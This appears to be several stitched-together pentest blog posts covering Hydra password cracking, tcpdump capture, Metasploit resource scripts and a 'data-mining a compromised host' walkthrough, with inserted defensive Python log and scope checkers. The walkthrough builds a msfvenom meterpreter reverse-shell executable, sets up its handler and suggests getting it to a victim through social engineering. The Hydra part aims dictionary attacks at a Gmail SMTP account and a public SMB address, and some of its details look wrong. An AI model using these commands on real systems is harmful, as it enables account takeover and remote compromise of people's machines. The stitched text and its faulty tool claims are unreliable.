Hydra

Hydra is a password cracking tool that is supported only on Linux systems. It comes pre-installed on Kali Linux and Parrot. Installation is very simple and takes a single command; if hydra does not show up as a pre-installed tool, the command in the next section installs it on our machine.

Installing Hydra:

Installing Hydra is simple: the following command installs the tool together with the packages it requires.

apt-get install hydra

Hydra Options:

The syntax is simple: the name of the tool, followed by the options, the host, and the service the attack is directed at, as shown in the example below:

hydra (options) host (service)

The main functions of hydra revolve around two flags:

  • -l: the username to test
  • -P: the password list that is used as the dictionary for the attack

These two flags point to the username and the file that guide the attack; an example of the syntax is shown below:

hydra -l user1 -P wordlist.txt smb 

The service declaration can be omitted from the syntax, but including it helps the cracking process when the information we are after is handled by a specific service. It is also useful to give the full path of the folder that contains the file we are working with, which eases the process.

Creating your own wordlist:

A wordlist to serve as the dictionary for the attack can be generated with a program called crunch, which produces combinations of letters and numbers according to the options you configure. This step is essential, because the wordlist is the key to the attack: testing different wordlists improves the effectiveness of the brute-force attack.

Crunch installation process:

Crunch can be installed by typing the following command:

sudo apt-get install crunch

Once the installation has finished, we can use crunch to generate a text file or pipe the characters into another program; an example is shown in the picture below:

After the process has finished, we can look for the file in the folder we selected:

Testing Hydra:

Now that we have explained the different characteristics of hydra, we are going to show a few example attacks against servers. The first is an attack against an FTP server, once we have created the wordlist and have the IP address assigned to the server. The attack can look like this:

As can be seen in the picture above, we managed to get the password for one of the users configured on the FTP server. In the example below, we repeat the process against an SMB service with the same result.

hydra -l user1 -P wordlist.txt smb://45.76.60.202 
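Both runs above leave a dense burst of failed logins in the server's log, which is what a defender watches for. The following is an added example, not code from the original post: a small Python detector that parses lines in the style of vsftpd's log (the sample lines are constructed for the example), counts failures per client address inside a sliding time window, flags any address that crosses a threshold, and records whether a successful login followed the burst, which is the sign that a dictionary attack actually worked. The threshold and window values are assumptions to tune per environment.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log in the style of vsftpd's log file (example data, not from the post).
SAMPLE_LOG = """\
Tue Mar 15 10:00:00 2024 [pid 2101] CONNECT: Client "192.168.0.117"
Tue Mar 15 10:00:01 2024 [pid 2101] [user1] FAIL LOGIN: Client "192.168.0.117"
Tue Mar 15 10:00:01 2024 [pid 2102] [user1] FAIL LOGIN: Client "192.168.0.117"
Tue Mar 15 10:00:02 2024 [pid 2103] [user1] FAIL LOGIN: Client "192.168.0.117"
Tue Mar 15 10:00:02 2024 [pid 2104] [user1] FAIL LOGIN: Client "192.168.0.117"
Tue Mar 15 10:00:03 2024 [pid 2105] [user1] FAIL LOGIN: Client "192.168.0.117"
Tue Mar 15 10:00:03 2024 [pid 2106] [user1] OK LOGIN: Client "192.168.0.117"
Tue Mar 15 10:05:00 2024 [pid 2201] [alice] FAIL LOGIN: Client "192.168.0.50"
Tue Mar 15 10:20:00 2024 [pid 2202] [alice] OK LOGIN: Client "192.168.0.50"
"""

# One login event per line: timestamp, username, FAIL/OK, client address.
LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} \d{1,2} \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]+)\] (?P<result>FAIL|OK) LOGIN: Client "(?P<ip>[\d.]+)"'
)


def parse_logins(text):
    """Yield (timestamp, user, result, client_ip) for every login line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # CONNECT lines and anything unrecognised are ignored
        ts = datetime.strptime(m.group("ts"), "%a %b %d %H:%M:%S %Y")
        yield ts, m.group("user"), m.group("result"), m.group("ip")


def detect_bruteforce(text, threshold=5, window=timedelta(seconds=60)):
    """Return one alert per client IP that produced at least `threshold`
    failed logins inside any sliding window of `window` length.
    Each alert records when the burst started, how many failures were in the
    window, which usernames were tried (one user = dictionary attack, many
    users = password spraying) and whether a successful login followed."""
    recent = defaultdict(deque)   # ip -> timestamps of recent failures
    users = defaultdict(set)      # ip -> usernames seen failing from that ip
    alerts = {}
    for ts, user, result, ip in parse_logins(text):
        if result == "FAIL":
            q = recent[ip]
            q.append(ts)
            users[ip].add(user)
            while q and ts - q[0] > window:   # drop failures outside the window
                q.popleft()
            if len(q) >= threshold and ip not in alerts:
                alerts[ip] = {"first_seen": q[0], "failures": len(q),
                              "users": set(users[ip]), "success_after": False}
        elif ip in alerts:
            # a successful login after the burst means the guess likely worked
            alerts[ip]["success_after"] = True
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {info['failures']} failures from {info['first_seen']}, "
              f"users={sorted(info['users'])}, success_after={info['success_after']}")
```

On the constructed log the address 192.168.0.117 is flagged after five failures in three seconds against a single user, and the OK LOGIN that follows sets success_after, which is the case that should page someone rather than just be counted. The single failure from 192.168.0.50 followed by a login fifteen minutes later is ordinary user behaviour and produces no alert.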

Other methodologies:

The next step looks at cracking the password of an email account. Email services are usually handled by an SMTP service. Using hydra we can specify the port on which this service handles email; the following command, which directs the attack to port 565 of the smtp.gmail.com server, serves as an example:

hydra -l jdoe@gmail.com -P /root/Desktop/wordlist.txt -S 565 smtp.gmail.com smtp 

The last Hydra flag to be presented is -x. At times a user has a ridiculously long and complicated password that direct attacks cannot crack; however, there is one method that all passwords eventually fall victim to: the brute-force attack. In a brute-force attack every combination is tried to determine the password. The CPU determines the speed, but in the long run the password will be cracked. Here is how the brute-force option is invoked in hydra:

hydra -l <user> -x <shortest length>:<longest length>:<combinations> <host>


Final Considerations:

Passwords are indeed the most commonly used mode of authentication. Of course, attacks could be directed at exploiting the system itself, but in my personal experience it is much easier to break into a specific account that is password protected or located on a server.

This can compromise the whole system. There is a wide range of methods that can be applied to crack passwords. Another tool that serves this purpose is John the Ripper, which resembles Hydra in scope but is focused on testing the integrity of passwords. The methods discussed previously include brute-force, dictionary, and direct attacks on people (phishing, social engineering and users' lack of knowledge). All but the latter can be carried out with the software called THC-Hydra (Hydra). Hydra can be combined with a tool called Nessus, which is used for vulnerability scanning and often calls Hydra to complete the process. Below is an example video of hydra used to perform different attacks:

 

TCPDump – Traffic Capture & Analysis

Description of the tool:

TCPdump is a command line tool that prints a description and the contents of the packets passing through a network interface that match a boolean expression. The tool can also be run with different flags that change its behaviour.

Without further configuration, TCPdump runs with the -c flag as default and captures all packets until it is interrupted by a stop signal.

Installation:

The tool can be installed from the terminal with the following command:

apt-get install tcpdump

Using TCPdump:

Once the tool is installed we can use different commands to capture the traffic that goes through an interface. First, the following command lists the flags available for the tool:

Now we can use the tool to select an interface and see the traffic going through it. Before exploring the packets that arrive on a specific interface we must know the interface's name, so we first apply the following command to list our interfaces:

Now that we know the name of our interface, we can use TCPdump to capture the packets handled by that interface with the following command:

sudo tcpdump -i enp0s3

As can be seen in the picture above, the traffic on that interface is displayed by passing the -i flag to tcpdump. We can also select the source of the packets with the following command:

sudo tcpdump -i enp0s3 src 192.168.0.117

Note: The IP address serves as a local demonstration but you can select any IP connected in your network.

We can also lock in and specify the type of traffic we want to analyze, as can be seen in the picture above.

We can also use tcpdump to capture the packets for an entire segment of the network, selecting destination IP addresses together with source addresses, by typing the following command:

sudo tcpdump -i enp0s3 -v dst 192.168.0.107 and src 192.168.0.1

Note: This example is performed on a local network, so the IP addresses may differ.
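The `src` and `dst` expressions above are evaluated by tcpdump before a packet is printed; the same selection can be applied afterwards to the text it emitted, which is how a quick triage script usually works. The following is an added example and not part of the original post: a Python parser for the one-line format `tcpdump -n` prints (the sample lines are constructed), a filter that reproduces the `src A` and `dst B and src A` expressions from the commands above, and a small check that lists, per source address, every destination and port it sent a bare SYN to, which is the usual signature of a host scanning the segment.

```python
import re
from collections import defaultdict

# Constructed lines in the style of `tcpdump -n` output (example data, not from the post).
SAMPLE_CAPTURE = """\
10:15:01.100000 IP 192.168.0.117.51234 > 192.168.0.1.80: Flags [S], seq 100, win 64240, length 0
10:15:01.101000 IP 192.168.0.1.80 > 192.168.0.117.51234: Flags [S.], seq 500, ack 101, win 65535, length 0
10:15:01.102000 IP 192.168.0.117.51234 > 192.168.0.1.80: Flags [.], ack 501, win 502, length 0
10:15:02.000000 IP 192.168.0.117.51235 > 192.168.0.107.21: Flags [S], seq 200, win 64240, length 0
10:15:02.000500 IP 192.168.0.117.51236 > 192.168.0.107.22: Flags [S], seq 300, win 64240, length 0
10:15:03.000000 IP 192.168.0.117.40000 > 192.168.0.1.53: UDP, length 40
"""

# "<time> IP <src>.<sport> > <dst>.<dport>: <rest>"; the last dotted field is the port.
PKT_RE = re.compile(
    r"^(?P<time>\d\d:\d\d:\d\d\.\d+) IP "
    r"(?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+): (?P<rest>.*)$"
)
FLAGS_RE = re.compile(r"Flags \[([^\]]*)\]")


def parse_capture(text):
    """Turn tcpdump text lines into dicts with addresses, ports, protocol and TCP flags."""
    packets = []
    for line in text.splitlines():
        m = PKT_RE.match(line)
        if not m:
            continue  # non-IP lines (ARP, truncated output) are skipped
        pkt = m.groupdict()
        pkt["sport"] = int(pkt["sport"])
        pkt["dport"] = int(pkt["dport"])
        flags = FLAGS_RE.search(pkt["rest"])
        if flags:
            pkt["proto"], pkt["flags"] = "tcp", flags.group(1)
        elif pkt["rest"].startswith("UDP"):
            pkt["proto"], pkt["flags"] = "udp", ""
        else:
            pkt["proto"], pkt["flags"] = "other", ""
        packets.append(pkt)
    return packets


def filter_packets(packets, src=None, dst=None):
    """Offline equivalent of the tcpdump expressions `src A` and `dst B and src A`."""
    return [p for p in packets
            if (src is None or p["src"] == src) and (dst is None or p["dst"] == dst)]


def syn_fanout(packets):
    """For each source address, the distinct (destination, port) pairs it sent a
    bare SYN to. One source fanning out to many ports is a typical scan signature;
    the SYN-ACK replies (flags "S.") from the contacted hosts are not counted."""
    fan = defaultdict(set)
    for p in packets:
        if p["proto"] == "tcp" and p["flags"] == "S":
            fan[p["src"]].add((p["dst"], p["dport"]))
    return {src: sorted(targets) for src, targets in fan.items()}


if __name__ == "__main__":
    pkts = parse_capture(SAMPLE_CAPTURE)
    print(len(filter_packets(pkts, src="192.168.0.117")), "packets from 192.168.0.117")
    for src, targets in syn_fanout(pkts).items():
        print(src, "sent SYNs to", targets)
```

In the constructed capture the filter `dst 192.168.0.107 and src 192.168.0.117` keeps only the two SYNs to ports 21 and 22, and the fan-out check attributes three distinct targets to 192.168.0.117 while ignoring the SYN-ACK sent back by 192.168.0.1. Reading tcpdump text is convenient for triage; for anything more involved, save the capture with `-w` and open it in Wireshark, as the conclusion below suggests.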

Conclusion:

TCPdump is a helpful tool for capturing traffic on specific interfaces; it can be used along with Wireshark to explore the packets sent within the network.

Creating a simple resource script to be used with Metasploit.

As penetration testers, or even when just performing a simple, regular scan, we all know that tasks can become repetitive (e.g. when performing a pentest in a streamlined environment). Typing the Metasploit commands again and again and making minor changes to run an attack against the target can get a bit tiresome, but not to worry: this is where resource scripts are very useful, and they can be used in Metasploit to automate the repetitive tasks at hand.

They are essentially batch scripts: they contain a set of commands that are executed automatically and sequentially when you load the resource script in Metasploit. A resource script is created by chaining together a series of Metasploit console commands, mainly for scanning purposes, and you can even embed Ruby directly to do things like call APIs, interact with objects in the database, and iterate actions.

We are going to create a simple resource script as an example; it automates auxiliary scanning of an FTP service and tells us which version of the FTP service the target is currently running.

The commands are basically the same ones you are accustomed to using in Metasploit, with the addition of the automation.

You can create the script in any text editor you feel comfortable with.

We’ll create the script by typing Metasploit commands (the commands have the same structure), and they will be executed one after another.

The first command we’ll use is the following:

msfconsole
use auxiliary/scanner/ftp/ftp_version

This will execute the scanning process and tell us which FTP version is running on the target, as we said before.

The next command lets you “see” which options you want to set for the pentest using the script you’ll be creating.

msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(scanner/ftp/ftp_version) > options

As a result you will see the options available for the FTP module. For this example the most important ones are RHOSTS, THREADS, and selecting the appropriate range of machines (the target).

So for the script, we can do the following:

use auxiliary/scanner/ftp/ftp_version
set RHOSTS 192.168.100.4 [target host]
set THREADS 10 [number of threads]

The number of threads depends on the scale of the network, so if you are scanning a large network you have to increase the number of threads you use.

There is something to consider here: you can change these values “on the fly”. You don’t have to type the commands into the metasploit console again and again when you want to change the options you explore; you change them in the script, and they can be executed remotely.

Now we just execute the run command (or, if you are using an exploit module, exploit). As this is a simple resource script, we can do the following:

use auxiliary/scanner/ftp/ftp_version
set RHOSTS 192.168.1.103
set THREADS 10
run

We save this text file as ftp_scanner.rc. Using vim:

vim ftp_scanner.rc

use auxiliary/scanner/ftp/ftp_version
set RHOSTS 192.168.100.4
set THREADS 10
run

Then press Esc and type :w to write the file.

The extension .rc means resource script. Now we go to the location of the script to run it in Metasploit. There you type:

cd (location of the script you just created)

Make sure that your Metasploit PostgreSQL database is built and already running. Now we can perform the pentest of the FTP service by running this script against the target host set in RHOSTS.

In Metasploit we type

msfconsole -r ftp_scanner.rc


This will start the Metasploit Framework and launch the created resource script.
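Because a resource script runs unattended, the mistakes it can carry (an RHOSTS value outside the engagement's authorised range, a thread count that knocks over a fragile network, a run before any module is selected) are discovered only after the fact. The following is an added example, not code from the original post or from the Metasploit project: a Python linter that parses a script in the format built above (the sample script is constructed; the same format is used by the handler script in the Data-mining section below), skips comments and embedded <ruby> blocks, and checks each RHOSTS value against an allow-list of CIDR ranges before the script is handed to msfconsole -r. The list of recognised console commands and the thread limit are assumptions to adjust to your own use.

```python
import ipaddress

# Constructed resource script in the shape shown above (example data, not the post's own file).
SAMPLE_RC = """\
# ftp_scanner.rc - constructed example
use auxiliary/scanner/ftp/ftp_version
set RHOSTS 192.168.100.4
set THREADS 10
run
"""

# Console commands this linter recognises: a small, assumed subset of msfconsole's commands.
KNOWN_COMMANDS = {"use", "set", "setg", "unset", "run", "exploit", "back",
                  "sleep", "spool", "db_nmap", "workspace"}


def parse_rc(text):
    """Split a resource script into (command, arguments) pairs.
    Lines starting with '#' are comments; the body of a <ruby>...</ruby> block
    is skipped because it is Ruby code rather than console commands."""
    commands, problems = [], []
    in_ruby = False
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line == "<ruby>":
            in_ruby = True
            continue
        if line == "</ruby>":
            in_ruby = False
            continue
        if in_ruby:
            continue
        cmd, _, args = line.partition(" ")
        if cmd not in KNOWN_COMMANDS:
            problems.append(f"line {lineno}: unknown console command '{cmd}'")
        commands.append((cmd, args.strip()))
    return commands, problems


def check_scope(text, allowed_networks, max_threads=50):
    """Lint a resource script before it is run: every RHOSTS entry must lie
    inside one of the authorised networks (CIDR strings), THREADS must be a
    number no larger than max_threads, and run/exploit must follow a use."""
    commands, problems = parse_rc(text)
    nets = [ipaddress.ip_network(n) for n in allowed_networks]
    module = None
    for cmd, args in commands:
        if cmd == "use":
            module = args
        elif cmd in ("set", "setg"):
            key, _, value = args.partition(" ")
            key, value = key.upper(), value.strip()
            if key == "RHOSTS":
                for host in value.split():
                    try:
                        target = ipaddress.ip_network(host, strict=False)  # single IP becomes /32
                    except ValueError:
                        problems.append(f"RHOSTS '{host}' is not an IP address or CIDR range")
                        continue
                    in_scope = any(target.subnet_of(n) for n in nets if n.version == target.version)
                    if not in_scope:
                        problems.append(f"RHOSTS '{host}' is outside the authorised scope")
            elif key == "THREADS":
                if not value.isdigit() or int(value) > max_threads:
                    problems.append(f"THREADS '{value}' exceeds the limit of {max_threads}")
        elif cmd in ("run", "exploit") and module is None:
            problems.append(f"'{cmd}' appears before any 'use'")
    return problems


if __name__ == "__main__":
    for issue in check_scope(SAMPLE_RC, ["192.168.100.0/24"]) or ["no problems found"]:
        print(issue)
```

Run it as a pre-flight step: an empty list means the script only touches the agreed scope, while any message is a reason to edit the .rc file before typing msfconsole -r. The allow-list is the engagement's authorised ranges, kept in one place so that the "edit the IP and run again" workflow described next cannot silently drift outside it.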

Advantages of the Resource Scripts

Now the interesting thing about this procedure is that, after performing the scan and getting the results sorted and ready for you to assess, if you want to change the IP or increase the threads you just have to edit the script and run it again.

The versatility of resource scripts lies in their ability to take advantage of many of the capabilities available in Metasploit and Ruby, whether you use them from the Metasploit console or from the Metasploit web interface.

The Metasploit Framework community has made many resource scripts available, so if you are a framework user, you can go to.

Here at Infosec Addicts, in our courses Pentesting Candidate Program and Ultimate Hacklab, you can get more information about creating these useful tools to facilitate audit procedures or pentests using Metasploit. We sincerely hope you join us in this quest of finding the best and most reliable solutions to perform a thorough and reliable pentest.

 

 

Data-mining a compromised host

In this blog we are going to take a file (which can be .txt, .doc or .exe) and inject a payload into it; later we will verify which antivirus detects it, and finally we will place the file on the victim machine and observe what happens.

What is a payload?

A payload is something harmful that is activated when malware is executed; besides raising privileges, it takes full advantage of the vulnerabilities found. In essence, the payload is the part of the malicious code within the exploit that is in charge of exploiting the vulnerability to the maximum.

Installing tools on Ubuntu and Debian

This post does not focus on installing Metasploit, but we will do a little review so you know what it is about.

Open a Linux terminal and copy and paste the following command:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

The result of the command will be the following:

If you run into an error during the installation, the necessary documentation to perform it can be found at https://www.metasploit.com/.

There are many tools for creating a payload; a significant one is Metasploit. We will generate a payload to attack Windows 7.

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3 -b "\x00" -f exe -o Meterpreter.exe

This is the file we have created and will put on the victim machine. Next we set up the handler that receives the connection, using a resource script:

touch meterpreter.rc
echo use exploit/multi/handler >> meterpreter.rc
echo set PAYLOAD windows/meterpreter/reverse_tcp >> meterpreter.rc
echo set LHOST 192.168.100.3 >> meterpreter.rc
echo set ExitOnSession false >> meterpreter.rc
echo exploit -j -z >> meterpreter.rc
cat meterpreter.rc

msfconsole -r meterpreter.rc

To put the payload on the victim’s machine you can use social engineering or any other way. In this case we will upload it through a meterpreter session to make it faster.

The following image shows the file on the Windows 7 machine.

This would be the result of the attack:

Checking the victim’s network settings

This is another command we can test with; it shows a list of files and directories.

A meterpreter session, like a Windows shell, offers a large number of commands that are very useful when making an attack.